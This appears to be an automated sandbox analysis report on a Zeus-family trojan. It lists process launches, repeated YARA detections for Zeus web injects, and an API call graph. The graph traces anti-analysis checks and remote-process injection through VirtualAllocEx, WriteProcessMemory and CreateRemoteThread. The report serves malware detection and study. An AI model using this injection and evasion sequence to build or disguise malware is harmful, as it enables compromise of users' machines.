                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.2334780970.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                            Start time:02:59:16
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 804
                                                                                                                                                                                                            Imagebase:0xae0000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                            Start time:02:59:16
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 800
                                                                                                                                                                                                            Imagebase:0xae0000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                            Start time:02:59:16
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.2347000014.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.2347461629.0000000003100000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                            Start time:02:59:17
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000F.00000002.2112522705.00000000024E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000F.00000002.2112434422.0000000002480000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                            Start time:02:59:17
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 748
                                                                                                                                                                                                            Imagebase:0xae0000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                            Start time:02:59:18
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 760
                                                                                                                                                                                                            Imagebase:0xae0000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                            Start time:02:59:19
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2113815315.0000000002540000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2114823849.0000000002910000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                            Start time:02:59:19
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2119300730.00000000022D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2119609866.00000000024B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                            Start time:02:59:19
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000017.00000002.2120228960.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000017.00000002.2120830314.0000000003200000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                            Start time:02:59:20
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2124213315.00000000008F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2124084846.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                            Start time:02:59:20
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2126205049.0000000001590000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2126064053.00000000014F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                            Start time:02:59:20
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2129537008.0000000002CC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2129989380.0000000002E60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                            Start time:02:59:21
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2132321964.0000000001040000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2132243735.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                            Start time:02:59:21
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2137945302.00000000032F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2137351546.0000000003150000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                            Start time:02:59:21
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2140900930.0000000002060000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2141147552.00000000020C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                            Start time:02:59:22
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000025.00000002.2162183852.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000025.00000002.2196325430.0000000003140000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                            Start time:02:59:22
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2148807567.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2148506463.0000000001270000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:1.6%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:62.9%
                                                                                                                                                                                                              Total number of Nodes:259
                                                                                                                                                                                                              Total number of Limit Nodes:11
                                                                                                                                                                                                              execution_graph 21140 402d30 LoadLibraryA GetModuleFileNameA 21212 403a20 RegOpenKeyExA 21140->21212 21143 402d64 ExitProcess 21144 402d6c 21226 4021d0 CreateFileA 21144->21226 21149 402da1 21237 402360 CreateFileA 21149->21237 21150 402d89 GetTickCount PostMessageA 21150->21149 21159 402dc1 21349 401ea0 40 API calls 21159->21349 21160 402de3 IsUserAnAdmin GetModuleHandleA 21162 402e1c 21160->21162 21163 402dfd GetProcAddress 21160->21163 21166 402e22 21162->21166 21167 402e6e 21162->21167 21163->21162 21165 402e0f GetCurrentProcess 21163->21165 21164 402dc6 21168 402dd2 21164->21168 21169 402dca ExitProcess 21164->21169 21165->21162 21172 402e26 StrStrIA 21166->21172 21173 402e3c 21166->21173 21170 402e76 StrStrIA 21167->21170 21171 402efd 21167->21171 21350 403560 70 API calls 21168->21350 21176 402ea1 21170->21176 21177 402e8c 21170->21177 21174 402930 9 API calls 21171->21174 21172->21173 21178 402e5f 21172->21178 21263 402930 RegCreateKeyExA 21173->21263 21182 402f08 GlobalFindAtomA 21174->21182 21180 402a70 106 API calls 21176->21180 21185 402930 9 API calls 21177->21185 21303 402a70 VirtualQuery GetModuleFileNameA 21178->21303 21186 402ea6 GlobalFindAtomA 21180->21186 21188 402f58 ExitProcess 21182->21188 21189 402f18 GlobalAddAtomA IsUserAnAdmin 21182->21189 21184 402dd7 21184->21160 21191 402ddb ExitProcess 21184->21191 21192 402e97 21185->21192 21193 402ef6 21186->21193 21194 402eb6 GlobalAddAtomA IsUserAnAdmin 21186->21194 21196 402f39 IsUserAnAdmin 21189->21196 21197 402f29 21189->21197 21351 4028d0 43 API calls 21192->21351 21204 4012b0 9 API calls 21193->21204 21200 402ed7 IsUserAnAdmin 21194->21200 21201 402ec7 21194->21201 21202 402f44 21196->21202 21197->21196 21205 402ee2 21200->21205 21201->21200 21353 4015a0 7 API calls 21202->21353 21203 402e69 21203->21188 21204->21203 21352 4015a0 7 API calls 21205->21352 21208 402f4f 21208->21188 21210 401670 32 API calls 21208->21210 21209 402eed 21209->21193 21211 401670 32 API calls 21209->21211 21210->21188 21211->21193 21213 403a6a RegQueryValueExA 21212->21213 21214 403acd GetUserNameA CharUpperA strstr 21212->21214 21216 403a9b RegCloseKey 21213->21216 21217 403a8f RegCloseKey 21213->21217 21215 403b0b strstr 21214->21215 21219 402d60 21214->21219 21218 403b24 strstr 21215->21218 21215->21219 21216->21214 21220 403aae 21216->21220 21217->21214 21218->21219 21221 403b3d GetSystemWindowsDirectoryA GetVolumeInformationA 21218->21221 21219->21143 21219->21144 21220->21214 21220->21219 21221->21219 21222 403b7d 21221->21222 21222->21219 21223 403b99 GetModuleFileNameA StrStrIA 21222->21223 21223->21219 21224 403bc5 StrStrIA 21223->21224 21224->21219 21225 403bd7 StrStrIA 21224->21225 21225->21219 21227 402350 21226->21227 21228 402320 DeviceIoControl CloseHandle 21226->21228 21229 4020e0 memset SHGetFolderPathA 21227->21229 21228->21227 21230 4021a7 21229->21230 21231 40213e PathAppendA SetCurrentDirectoryA 21229->21231 21233 4021b2 FindWindowA 21230->21233 21234 4021ab FreeLibrary 21230->21234 21231->21230 21232 402161 LoadLibraryA 21231->21232 21232->21230 21235 402175 GetProcAddress 21232->21235 21233->21149 21233->21150 21234->21233 21235->21230 21236 402185 21235->21236 21236->21230 21238 402403 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 21237->21238 21239 402444 21237->21239 21238->21239 21240 402450 SHGetFolderPathA 21239->21240 21241 402535 21240->21241 21242 402477 MoveFileA 21240->21242 21244 402540 SHGetFolderPathA 21241->21244 21242->21241 21245 40266f 21244->21245 21246 40256b CreateFileA 21244->21246 21249 402680 CoInitializeEx 21245->21249 21246->21245 21248 4025d1 11 API calls 21246->21248 21248->21245 21250 4026ae 21249->21250 21251 4026bf GetModuleFileNameW SysAllocString 21249->21251 21250->21251 21253 4028c4 IsUserAnAdmin 21250->21253 21252 4026ed SysAllocString 21251->21252 21257 402866 21251->21257 21254 402853 SysFreeString 21252->21254 21255 4026fe CoCreateInstance 21252->21255 21253->21159 21253->21160 21256 402863 SysFreeString 21254->21256 21254->21257 21259 402827 21255->21259 21260 402725 21255->21260 21256->21257 21257->21253 21258 4028be CoUninitialize 21257->21258 21258->21253 21259->21254 21260->21254 21260->21259 21261 4027b3 CoCreateInstance 21260->21261 21262 4027d5 21261->21262 21262->21259 21264 402975 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 21263->21264 21265 4029fd RegCreateKeyExA 21263->21265 21267 4029e0 21264->21267 21266 402a44 21265->21266 21265->21267 21268 402a4c RegFlushKey RegCloseKey 21266->21268 21269 402a5d GetCurrentProcessId 21266->21269 21267->21267 21270 402a3e RegSetValueExA 21267->21270 21268->21269 21271 401670 21269->21271 21270->21266 21272 4018d8 Sleep 21271->21272 21274 401686 21271->21274 21272->21188 21275 4016a5 21274->21275 21276 40169b Sleep 21274->21276 21354 401cf0 11 API calls 21274->21354 21355 401cf0 11 API calls 21275->21355 21276->21274 21276->21275 21278 4016ac 21279 4018d3 21278->21279 21280 4016b4 OpenProcess 21278->21280 21279->21272 21280->21279 21281 4016cf GetModuleHandleA 21280->21281 21282 401706 21281->21282 21283 4016eb GetProcAddress 21281->21283 21285 40170c GetModuleHandleA 21282->21285 21286 40173f VirtualAllocEx 21282->21286 21283->21282 21284 4016f9 GetCurrentProcess 21283->21284 21284->21282 21287 401722 GetProcAddress 21285->21287 21288 40172e 21285->21288 21289 4018b0 GetHandleInformation 21286->21289 21290 401782 WriteProcessMemory 21286->21290 21287->21288 21288->21286 21288->21289 21289->21279 21293 4018c6 21289->21293 21291 4017ae 21290->21291 21292 40181f WriteProcessMemory FlushInstructionCache CreateRemoteThread 21290->21292 21294 4017b1 VirtualAlloc 21291->21294 21301 401819 21291->21301 21295 401862 GetHandleInformation 21292->21295 21296 40188e RtlCreateUserThread 21292->21296 21293->21279 21297 4018cc CloseHandle 21293->21297 21294->21291 21298 4017c9 memcpy WriteProcessMemory VirtualFree 21294->21298 21299 401885 21295->21299 21300 401878 21295->21300 21296->21289 21297->21279 21298->21291 21299->21289 21300->21299 21302 40187e CloseHandle 21300->21302 21301->21292 21302->21299 21304 402ad0 21303->21304 21304->21304 21305 402adf 